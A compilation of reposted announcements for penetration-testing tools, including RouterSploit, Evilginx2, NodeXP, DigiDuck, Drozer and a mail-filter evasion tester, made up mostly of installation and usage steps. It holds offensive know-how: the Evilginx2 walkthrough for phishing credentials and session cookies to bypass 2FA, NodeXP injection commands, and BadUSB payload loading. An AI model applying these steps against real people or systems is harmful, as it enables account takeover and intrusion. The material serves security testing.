RouterSploit v3.4.0 – Exploitation Framework For Embedded Devices

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.It consists of various modules that aids penetration testing operations:exploits – modules that take advantage of identified vulnerabilitiescreds – modules designed to test credentials against network servicesscanners – modules that check if a target is vulnerable to any exploitpayloads – modules that are responsible for generating payloads for various architectures and injection pointsgeneric – modules that perform generic attacksInstallationRequirementsRequired:futurerequestsparamikopysnmppycryptoOptional:bluepy – bluetooth low energyInstallation on Kali Linuxapt-get install python3-pipgit clone https://www.github.com/threat9/routersploitcd routersploitpython3 -m pip install -r requirements.txtpython3 rsf.pyBluetooth Low Energy support:apt-get install libglib2.0-devpython3 -m pip install bluepypython3 rsf.pyInstallation on Ubuntu 18.04 & 17.10sudo add-apt-repository universesudo apt-get install git python3-pipgit clone https://www.github.com/threat9/routersploitcd routersploitpython3 -m pip install -r requirements.txtpython3 rsf.pyBluetooth Low Energy support:apt-get install libglib2.0-devpython3 -m pip install bluepypython3 rsf.pyInstallation on OSXgit clone https://www.github.com/threat9/routersploitcd routersploitsudo python3 -m pip install -r requirements.txtpython3 rsf.pyRunning on Dockergit clone https://www.github.com/threat9/routersploitcd routersploitdocker build -t routersploit .docker run -it –rm routersploitUpdateUpdate RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.cd routersploitgit pullDownload Routersploit

Link: http://www.kitploit.com/2018/10/routersploit-v340-exploitation.html

Evilginx v2.0 – Standalone Man-In-The-Middle Attack Framework Used For Phishing Login Credentials Along With Session Cookies, Allowing For The Bypass Of 2-Factor Authentication

evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx, released in 2017, which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.DisclaimerThis work is merely a demonstration of what adept attackers can do. It is the defender’s responsibility to take such attacks into consideration and find ways to protect their users against this type of phishing attacks. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.VideoSee evilginx2 in action here:Evilginx 2 – Next Generation of Phishing 2FA Tokens from breakdev.org on Vimeo.Write-upIf you want to learn more about this phishing technique, I’ve published an extensive blog post about evilginx2 here:https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokensInstallationYou can either use a precompiled binary package for your architecture or you can compile evilginx2 from source.You will need an external server where you’ll host your evilginx2 installation. I personally recommend Digital Ocean and if you follow my referral link, you will get an extra $10 to spend on servers for free.Evilginx runs very well on the most basic Debian 8 VPS.Installing from sourceIn order to compile from source, make sure you have installed GO of version at least 1.10.0 (get it from here) and that $GOPATH environment variable is set up properly (def. $HOME/go).After installation, add this to your ~/.profile, assuming that you installed GO in /usr/local/go:export GOPATH=$HOME/goexport PATH=$PATH:/usr/local/go/bin:$GOPATH/binThen load it with source ~/.profiles.Now you should be ready to install evilginx2. Follow these instructions:sudo apt-get install git makego get -u github.com/kgretzky/evilginx2cd $GOPATH/src/github.com/kgretzky/evilginx2makeYou can now either run evilginx2 from local directory like:sudo ./bin/evilginx -p ./phishlets/or install it globally:sudo make installsudo evilginxInstructions above can also be used to update evilginx2 to the latest version.Installing with DockerYou can launch evilginx2 from within Docker. First build the container:docker build . -t evilginx2Then you can run the container:docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2Phishlets are loaded within the container at /app/phishlets, which can be mounted as a volume for configuration.Installing from precompiled binary packagesGrab the package you want from here and drop it on your box. Then do:unzip .zip -d <package_name>cd <package_name>If you want to do a system-wide install, use the install script with root privileges:chmod 700 ./install.shsudo ./install.shsudo evilginxor just launch evilginx2 from the current directory (you will also need root privileges):chmod 700 ./evilginxsudo ./evilginxUsageIMPORTANT! Make sure that there is no service listening on ports TCP 443, TCP 80 and UDP 53. You may need to shutdown apache or nginx and any service used for resolving DNS that may be running. evilginx2 will tell you on launch if it fails to open a listening socket on any of these ports.By default, evilginx2 will look for phishlets in ./phishlets/ directory and later in /usr/share/evilginx/phishlets/. If you want to specify a custom path to load phishlets from, use the -p <phishlets_dir_path> parameter when launching the tool.Usage of ./evilginx: -debug Enable debug output -developer Enable developer mode (generates self-signed certificates for all hostnames) -p string Phishlets directory pathYou should see evilginx2 logo with a prompt to enter commands. Type help or help <command> if you want to see available commands or more detailed information on them.Getting startedTo get up and running, you need to first do some setting up.At this point I assume, you’ve already registered a domain (let’s call it yourdomain.com) and you set up the nameservers (both ns1 and ns2) in your domain provider’s admin panel to point to your server’s IP (e.g. 10.0.0.1):ns1.yourdomain.com = 10.0.0.1ns2.yourdomain.com = 10.0.0.1Set up your server’s domain and IP using following commands:config domain yourdomain.comconfig ip 10.0.0.1Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):phishlets hostname linkedin my.phishing.hostname.yourdomain.comAnd now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:phishlets enable linkedinYour phishing site is now live. Think of the URL, you want the victim to be redirected to on successful login and get the phishing URL like this (victim will be redirected to https://www.google.com):phishlets get-url linkedin https://www.google.comRunning phishlets will only respond to tokenized links, so any scanners who scan your main domain will be redirected to URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use phishlet hide/unhide <phishlet> command.You can monitor captured credentials and session cookies with:sessionsTo get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:sessions <id>The captured session cookie can be copied and imported into Chrome browser, using EditThisCookie extension.Important! If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.Download Evilginx2

Link: http://feedproxy.google.com/~r/PentestTools/~3/MZwD9sSUDgw/evilginx-v20-standalone-man-in-middle.html

Quasar – An Information Gathering Framework For Lazy Penetration Testers

Quasar Is An Information Gathering Framework For Penetration Testers Coded By Belahsan Ouerghi:Website InformationsE-mail Address CheckerPhone Number InformationCredit Card Bin CheckerIp LocatorPort ScannerInstallationsudo apt-get install gitgit clone https://github.com/TunisianEagles/quasar.gitcd quasarchmod +x install.shchmod +x quasar.shsudo ./install.shsudo ./quasar.shScreenshotsTested On :Backbox linuxUbuntuTutorialContactContact – Belahsan OuerghiYoutube – Tunisian Eagles Youtube ChannelDownload Quasar

Link: http://feedproxy.google.com/~r/PentestTools/~3/Fd3ymvOCDo0/quasar-information-gathering-framework.html

DigiDuck Framework – Framework For Digiduck Development Boards Running ATTiny85 Processors And Micronucleus Bootloader

Framework for Digiduck Development Boards running ATTiny85 processors and micronucleus bootloader!Roadmap:Plan to implement a command for Duckyspark translation within the framework.Requirements:- ATTiny85 or other compatible “Digispark" Development Board(s)- DigiSpark Drivers (If you can use it with arduino you should be fine.)- OSX or MacOS- ArduinoIDE with Digispark Library InstalledGetting Started:Installation:DigiDuck Framework (Referred to as DDF) is really simple to start and setup! There are no third party modules required for DDF! All you need to do is make sure you have Python 3.6+ (I used this to develop it but it should be backwards compatible *hopefully*). Clone this repository and enter the directory from the command line. Once inside the directory simply run:python start.pyThis will start the program and display the Welcome Screen shown above.Help Menu::There are three commands in this Framework! I wanted to make this as lightweight as possible so it only requires one command in order to get a payload onto your board.Command: helpThe help command displays this menu:Command: showThe show command displays this menu:All your available payloads will be shown here. However if you run the execute command they display again.Execution:The third and last command in DDF is execute. The execute command will display the same menu as the show command, however from this menu you will input the payload name. You have to include .hex at the end of it or it won’t load correctly and ask you to enter it again.execute command display.Once you choose your payload you will be prompted to insert your desired board into the computer. From there it will install the desired payload and display this when completed:Thats it! You can now go plug in your badUSB DigiSpark board into a computer and run the desired payload!Payloads:Payloads are DigiSpark .ino hex files that are installed using the micronucleus bootloader to your ATTiny85 or other boards.Current Payloads:All the current payloads are from Hak5’s RubberDucky scripts available here. If you are unsure of what a payload may do this is the place to go read about it. I’ll try to keep the payloads close to the same name but I don’t want you on Windows to be typing out too much since rlcompleter doesn’t work.Creating a Payload:Head to the (Duckyspark GitHub Page)[https://github.com/toxydose/Duckyspark] to see how to create your translated .ino file from a RubberDucky script. After that load your .ino file into Arduino IDE. Make sure Verbose is on inside Preferences and compile your code. Open the terminal output below and look for the .hex file location. It should be in a temp directory in your AppData or equivalent on MacOS. Here’s and example: This is right above where it tells you to plug in your board!Pull the payloadname.cpp.hex file from that folder and drag it into payloads inside the DDF framework. Run the program and your payload will be loaded into Available Payloads!Feel free to contribute by adding custom or more payloads from the Rubber Ducky scripts above! Make a PR with the new payloads.Credits:Duckyspark – https://github.com/toxydose/Duckyspark Micronucleus – https://github.com/micronucleus/micronucleus Hak5 RubberDucky Payloads – https://github.com/hak5darren/USB-Rubber-Ducky/wiki/PayloadsDownload DigiDuck-Framework

Link: http://feedproxy.google.com/~r/PentestTools/~3/W2pYkIn97a4/digiduck-framework-framework-for.html

EKFiddle v.0.8.2 – A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General

A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.InstallationDownload and install the latest version of Fiddlerhttps://www.telerik.com/fiddlerSpecial instructions for Linux and Mac here:https://www.telerik.com/blogs/fiddler-for-linux-beta-is-herehttps://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1Enable C# scripting (Windows only)Launch Fiddler, and go to Tools -> OptionsIn the Scripting tab, change the default (JScript.NET) to C#.Change default text editor (optional)In the same Tools -> Options menu, click on the Tools tab.Windows: notepad.exe or notepad++.exeLinux: geditMac: /Applications/TextEdit.app or /Applications/TextWrangler.appClose FiddlerDownload or clone CustomRules.cs into the appropriate folder based on your operating system:Windows (7/10) C:\Users\[username]\Documents\Fiddler2\Scripts\ Ubuntu /home/[username]/Fiddler2/Scripts/ Mac /Users/[username]/Fiddler2/Scripts/ Finish up the installationStart Fiddler to complete the installation of EKFiddle. That’s it, you’re all set!FeaturesToolbar buttonsThe added toolbar buttons give you quick shortcuts to some of the main features:QuickSaveDumps current web sessions into a SAZ named (QuickSave-“MM-dd-yyyy-HH-mm-ss".saz) to EKFiddle\Captures.UI modeToggle between the default column view or extra columns with additional information (includes time stamp, server IP and type, method, etc.).VPNVPN GUI directly built into Fiddler. It uses the OpenVPN client on Windows and Linux with ovpn files (sigining up with commercial VPN provider may be required). It will open up a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous to ensure only one TAP adapter is used at any given time.WindowsDownload and install OpenVPN in default directoryPlace your .ovpn files inside OpenVPN’s config folder.Linux (tested on Ubuntu 16.04)sudo apt-get install openvpnPlace your .ovpn files in /etc/openvpn.ProxyAllows you to connect to an upstream proxy (HTTP/s or SOCKS).Import SAZ/PCAPA shortcut to load SAZ (Fiddler’s native format) or PCAP (i.e. from Wireshark) captures.View/Edit RegexesView and create your custom regular expressions. Note: a master list is provided with auto-updates via GitHub. Additionally the custom list lets you create your own rules.There are 4 types of indicators to match on:URI (full or partial URI match)IP (Single IP address or IP range)SourceCode (Response Body)Headers (any value within a Response’s Headers)Syntax:Important! Fields are TAB delimitedURI My_URI_rule [a-z0-9]{2} Match URIIP My_IP_address_rule 5\.154\.191\.67 Match static IP addressIP My_IP_address_rule 5\.154\.191\.(6[0-9]|70) Match an IP rangeSourceCode My_sourcecode_rule vml=1 Look for specific stringHeaders My_headers_rule nginx Look for specific stringRun RegexesRun the master and custom regular expressions against current web sessions.Clear MarkingsClear any comment and colour highlighting in the currently loaded sessions.ContextAction menuThe ContextAction menu (accessed by right-clicking on any session(s) allows you to perform additional commands on selected sections. This can be very helpful to do quick lookups, compute hashes or extract IOCs.Hostname or IP address (Google Search, RiskIQ, URLQuery, RiskIQ)Query the hostname for the currently selected session.URIBuild RegexCreate a regular expression from the currently selected URI. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.Open in… Internet Explorer, Chrome, Firefox, EdgeThis opens up the URI with the browser you selected.Response BodyRemove encodingDecodes the currently selected sessions (from their basic encoding).Build RegexCreate a regular expression from the currently selected session’s source code. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.Calculate MD5/SHA256 hashGet the current session’s body and computes its hash.Hybrid Analysis / VirusTotal lookupChecks the current session’s body for hash, then look up that hash.Extract to DiskDownloads the currently selection session(s)’s body to disk, into the ‘Artifacts’ folder.Extract IOCsCopies into memory basic information from selected sessions so that they can be shared as IOCs. Extract Coinhive site keysConnect-the-dotsAllows you to identify the sequence of events between sessions. Right-clik on the session you are interested in retracing your steps to and simply ‘connect the dots’. It will label the sequence of events from 01, to n within the comments column. You can reorder that column to have a condensed view of the sequence.Crawler (experimental)Load a list of URLs from a text file and let the browser automically visit them. Tools -> Crawler (experimental) -> Start crawler May require some tweaks in your browser’s settings, in particular with regards to crash recovery.Uninstalling EKFiddleDelete CustomRules.csDownload EKFiddle

Link: http://feedproxy.google.com/~r/PentestTools/~3/gKB5SbwjRek/ekfiddle-v082-framework-based-on.html

HeapHopper – A Bounded Model Checking Framework For Heap-implementations

HeapHopper is a bounded model checking framework for Heap-implementations.Setupsudo apt update && sudo apt install build-essential python-dev virtualenvwrappergit clone https://github.com/angr/heaphopper.git && cd ./heaphoppermkvirtualenv -ppython2 heaphopperpip install -e .Required Packagesbuild-essential python-dev virtualenvwrapperRequired Python-Packagesana angr cle claripy IPython psutil pyelftools pyyamlExamples# Gen zoo of permutationsheaphopper.py gen -c analysis.yaml# Trace instancemake -C testsheaphopper.py trace -c tests/how2heap_fastbin_dup/analysis.yaml -b tests/how2heap_fastbin_dup/fastbin_dup.bin# Gen PoCheaphopper.py poc -c tests/how2heap_fastbin_dup/analysis.yaml -r tests/how2heap_fastbin_dup/fastbin_dup.bin-result.yaml -d tests/how2heap_fastbin_dup/fastbin_dup.bin-desc.yaml -s tests/how2heap_fastbin_dup/fastbin_dup.c -b tests/how2heap_fastbin_dup/fastbin_dup.bin# Testscd tests# Show sourcecat how2heap_fastbin_dup/fastbin_dup.c# Run tests./run_tests.py# Show PoC sourcecat pocs/malloc_non_heap/fastbin_dup.bin/poc_0_0.c# Run PoC./run_poc.sh pocs/malloc_non_heap/fastbin_dup.bin/bin/poc_0_0.binPublicationThis work has been published at the 27th USENIX Security Symposium.You can read the paper here.Cite:@inproceedings {heaphopper,author = {Eckert, Moritz and Bianchi, Antonio and Wang, Ruoyu and Shoshitaishvili, Yan and Kruegel, Christopher and Vigna, Giovanni},title = {HeapHopper: Bringing Bounded Model Checking to Heap Implementation Security},booktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)},year = {2018},address = {Baltimore, MD},url = {https://www.usenix.org/conference/usenixsecurity18/presentation/eckert},publisher = {{USENIX} Association},}Download Heaphopper

Link: http://feedproxy.google.com/~r/PentestTools/~3/8qtoF85AbYg/heaphopper-bounded-model-checking.html

DarkSpiritz – A Penetration Testing Framework For UNIX Systems

What is DarkSpiritz?Created by the SecTel Team it was a project of one of the owners to update and clean-up an older pentesting framework he had created to something updated and modern. DarkSpiritz is a re-vamp of the very popular framework known as “Roxysploit". You may be familiar with this framework and if you are then it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework known as Metasploit. If you know how to use metasploit setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins or you can head to our wiki here. If you need any help feel free to contact us at sectel.team@protonmail.com.Getting StartedClone the repository with git:git clone https://github.com/DarkSpiritz/DarkSpiritz.gitDarkSpiritz wiki available hereTo install DarkSpiritz clone the github repo and run:sudo python installer.pyThis will download all necessary modules for DarkSpiritz. Once you run this you will be able to run:python main.pyfrom within the same directory as DarkSpiritz.You will see a start-up screen. This screen will display things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.Features:These are features that DarkSpiritz Team prides themself on based on this program:Real Time Updating of ConfigurationNever a need to restart the program even when adding plugins or editing them.Easy to use UXMulti-functionalityScreenshots:Download DarkSpiritz

Link: http://feedproxy.google.com/~r/PentestTools/~3/b4RKOuo6W4s/darkspiritz-penetration-testing.html

NodeXP – Detection and Exploitation Tool for Node.js Services

NodeXP is an intergrated tool, written in Python 2.7, capable of detecting possible vulnerabilities on Node.js services as well as exploiting them in an automated way, based on S(erver)S(ide)J(avascript)I(njection) attack!Getting Started – Installation & UsageDownload NodeXP by cloning the Git repository:git clone https://github.com/esmog/nodexpTo get a list of all options run:python2.7 nodexp -hExamples for POST and GET cases accordingly:python2.7 nodexp.py –url=”http://nodegoat.herokuapp.com/contributions" –pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"python2.7 nodexp.py –url="http://nodegoat.herokuapp.com/contributions" –pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" –tech=blindpython2.7 nodexp.py –url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"python2.7 nodexp.py –url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" –tech=blindDisclaimerThe tool’s purpose is strictly academic and was developed in order to conduct my master’s thesis. It could also be helpful during the process of a penetration test on Node.js services. Any other malicious or illegal usage of the tool is strongly not recommended and is clearly not a part of the purpose of this research.PrerequisitesPython 2.7Metasploit FrameworkmsfvenomKali Linux (or any other Linux distro with Metasploit Framework installed)NodeXP TestbedsDownload and run the Node.js files for both GET and POST cases from hereVisit Nodegoat or install Nodegoat to your local machine!Built WithPython 2.7VersioningNodeXP – Version 1.0.0AuthorsDimitris Antonaropoulos – esmogDownload NodeXP

Link: http://feedproxy.google.com/~r/PentestTools/~3/OIgb6RZFu0o/nodexp-detection-and-exploitation-tool.html

Drozer v2.4.4 – The Leading Security Assessment Framework For Android

drozer (formerly Mercury) is the leading security testing framework for Android.drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS.drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR’s advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).drozer is open source software, maintained by MWR InfoSecurity, and can be downloaded from: mwr.to/drozerPrerequisitesPython2.7Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable. Protobuf 2.6 or greater Pyopenssl 16.2 or greater Twisted 10.2 or greater Java Development Kit 1.7 Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.Android Debug BridgeInstallingBuilding Python wheelgit clone https://github.com/mwrlabs/drozer/cd drozerpython setup.py bdist_wheelInstalling Python wheelsudo pip install drozer-2.x.x-py2-none-any.whlBuilding for Debian/Ubuntu/Mintgit clone https://github.com/mwrlabs/drozer/cd drozermake debInstalling .deb (Debian/Ubuntu/Mint)sudo dpkg -i drozer-2.x.x.debBuilding for Redhat/Fedora/CentOSgit clone https://github.com/mwrlabs/drozer/cd drozermake rpmInstalling .rpm (Redhat/Fedora/CentOS)sudo rpm -I drozer-2.x.x-1.noarch.rpmBuilding for WindowsNOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn’t be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.git clone https://github.com/mwrlabs/drozer/cd drozerpython.exe setup.py bdist_msiInstalling .msi (Windows)Run dist/drozer-2.x.x.win-x.msi Arch Linuxyaourt -S drozerUsageInstalling the AgentDrozer can be installed using Android Debug Bridge (adb).Download the latest Drozer Agent here.$ adb install drozer-agent-2.x.x.apkStarting a SessionYou should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you’re ready to start exploring.We will use the server embedded in the drozer Agent to do this.If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:$ adb forward tcp:31415 tcp:31415Now, launch the Agent, select the “Embedded Server” option and tap “Enable” to start the server. You should see a notification that the server has started.Then, on your PC, connect using the drozer Console:On Linux:$ drozer console connectOn Windows:> drozer.bat console connectIf using a real device, the IP address of the device on the network must be specified:On Linux:$ drozer console connect –server 192.168.0.10On Windows:> drozer.bat console connect –server 192.168.0.10You should be presented with a drozer command prompt:selecting f75640f67144d9a3 (unknown sdk 4.1.1) dz>The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.You are now ready to start exploring the device.Command Reference Command Description run Executes a drozer module list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run. shell Start an interactive Linux shell on the device, in the context of the Agent process. cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module. clean Remove temporary files stored by drozer on the Android device. contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system. echo Print text to the console. exit Terminate the drozer session. help Display help about a particular command or module. load Load a file containing drozer commands, and execute them in sequence. module Find and install additional drozer modules from the Internet. permissions Display a list of the permissions granted to the drozer Agent. set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer. unset Remove a named variable that drozer passes to any Linux shells that it spawns. Contacting the Projectdrozer is Open Source software, made great by contributions from the community.For full source code, to report bugs, suggest features and contribute patches please see our Github project:https://github.com/mwrlabs/drozerBug reports, feature requests, comments and questions can be submitted here.Follow the latest drozer news, follow the project on Twitter:@mwrdrozerDownload Drozer

Link: http://feedproxy.google.com/~r/PentestTools/~3/gWlKeA3JnbA/drozer-v244-leading-security-assessment.html

Mail Security Tester – A Testing Framework For Mail Security And Filtering Solutions

A testing framework for mail security and filtering solutions.IMPORTANT: Don’t do anything evil with this! Tests of cloud or otherwise hosted solutions should always be approved by the tested provider. Only use your own test accounts and don’t annoy anyone with a load of test mails.InstallationThe mail security testing framework works with with Python >=3.5. Just pull this repository and go ahead. No further dependencies are required.UsageThe script mail-tester.py runs the tests. Read the help message with ./mail-tester.py –help and check the list of test and evasion modules with ./mail-tester.py -l to get an overview about the capabilities and the usage of the script. Some hints:At least the parameters –smtp-server and –to should be given for a minimal test run.All parameters can also be stored in configuration files without the prefix –. These configuration files can be used by invoking ./mail-tester.py @tester.conf (configuration contained in tester.conf).Multiple recipients can be configured with –to for testing of different filter configurations.Some mail filtering solutions may reject messages after a while. Use –auto-delay for automatic throttling of the mails. This can be fine-tuned with –delay-step, –delay-max and –delay.Some tests (Spam and Malware) require samples. Put these in directories and configure these directories with –spam-folder and –malware-folder parameters. The samples are not included in this repository (and will not be). Good places to get malware are theZoo, Das Malwerk or other collections. Spam can be exported straight from yout Spam folder, but must be in EML format.Blacklists can be supplied with the –blacklist parameter and are used as sender addresses.The Shellshock and subject XSS test cases should have a valid backconnect domain, where you are able to see any backconnects (especially DNS requests). The free Canary Tokens service can be used for this purpose. Thanks to Thinkst for providing this awesome service!Some neat attachment recognition evasion tricks can be enabled with –evasion content-disposition. These were used in the past to confuse AV/sandboxing solutions and let them pass malicious mails.Don’t forget to log the test results with –log. Mail filtering providers often reject mails in the SMTP dialog, which is reflected in the generated log.Test cases can be dumped with –output as plain files in a directory, in MBox (–mbox) or MailDir (–maildir) format. This is useful to test mail user agents without sending any mails, to document or review generated test cases.Development and ExtensionTestsOwn tests can be implemented with a class in one of the iexisting or newly created Python files in the tests/ directory. The class must be a subclass of MailTestBase located in the module tests.base of this project. Newly implemented tests are discovered automatically when the class variable active is set to True. Further (if you plan to contribute tests back to the main repository), the class variables identifier, name and description should be set appropriately.The following base classes exist with methods or class variables intended for overriding:MailTestBase: Test class for generic tests.generateTestCases(): Yields test messages. These should be generated with the MIME* classes from the Python email.mime.* packages or with the Message class from email.message to ensure valid mail messages.active: Boolean value if test should be active.identifier: Short identifier of the test. This one is used to enable or disable tests in parameters.name: Short test title.description: Longer test description, should fit within approximately 100 characters.delivery_sender and delivery_recipient: Boolean values, False by default. Normally, the sender and recipients are set in the message and the Python SMTP module takes them over from there. Sometimes it is desirable to set them explicitely in the SMTP library, which can be configured by setting this values to True.finalizeMessage(msg): By default, the base test class sets the From and To headers accrodingly. This behaviour can be overridden if required for the test case.MailAttachmentTestBase: Test class for attachment test cases. This generates a complete valid mail with a Subject and a text part and attaches the test case to it. Derived from MailTestBase, therefore the methods/variables from it can be overridden here, too.generateAttachments(): Yields test cases as (description, attachment) tuples.subject: Sets the subject. The place holder {} is replaced by the description yielded by generateAttachments().generateTestCases(): is already overridden with an implementation of the message generation described above, but may be further adapted if required.Setting the subjects of generated messages is highly recommended to be able to recongize the tests in the receiving inbox.EvasionsEvasion classes implement techniques for evading recognition of particular mail properties by mail security solutions. Currently, a evasion technique that tries to hide attachments from such solutions by intentionally broken Content-Disposition headers is implemented.Implement new EvasionsEvasions are implemented by a factory class pattern. The DeliveryBase class instantiaties a factory class derived from the BaseEvasionFactory class. The factory constructor receives a flag that indicates if the evasion is activated. The evasion factory instance is then passed to the test class and stored in its evasions attribute that contains a dict with the evasion identifiers as keys. Inside the test, a evasion class (based on EvasionBase) is instantiated with getEvasionGenerator(). The constructor parameter are defined individually per evasion technique.The following base classes are used to implement evasions:BaseEvasionFactory: Evasion factories must be based on this class. Usually, only the following class variables should be set:active: Set to True if the evasion should be active.identifier: Short identifier of the evasion module used for enabling it in the test configuration.name: Short title of the evasion technique.description: Longer description of the evasion technique. Should fit in approximately 100 characters.generator_evasion: Evasion class that is instantiated if the evasion is enabled.generator_default: Evasion class that is instantiated if the evasion is disabled.BaseEvasion: Implementation of evasions must be a subclass of this base class. The following method must be overridden:__init__(): Should instantiate the class with the base message or attachment that should be manipulated with evasion techniques.generate(): Apply the evasion technique to the object passed to the constructor and yield it to the caller as (description, object with evasion applied) tuple.Generally, the evasion class should yield all evasion variants and pass the default as dedicated test case, while the default evasion classes only pass the given object or create the required data structures, like headers.Using Evasion Techniques in Test CasesEvasion techniques are used in test cases where they are applicable. E.g. if an evasion technique manipulates the header of a mail or attachment, the following steps have to be implemented:Generate the base object (mail or attachment) without consideration of the evasion.Instantiate the appropriate evasion class by utilization of the evasion factory instance from self.evasions, e.g.: evasion_items = self.evasions[“evasion_identifier"].getEvasionGenerator(message)Iterate over the generator and yield the test cases:for evasion_item in evasion_items: yield evasion_itemUsage of the Content Disposition Evasion TechniqueThe content disposition evasion technique is already implemented in the framework and should be used for all test cases that target on the recognition of malicious attachments. The constructor receives an attachment and the intended file name. The evasion class then yields (evasion name, attachment with applied evasion technique) tuples that can directly be yielded by the tests generateAttachments() method.Download Mail-Security-Tester

Link: http://feedproxy.google.com/~r/PentestTools/~3/HrZh9xBkVuo/mail-security-tester-testing-framework.html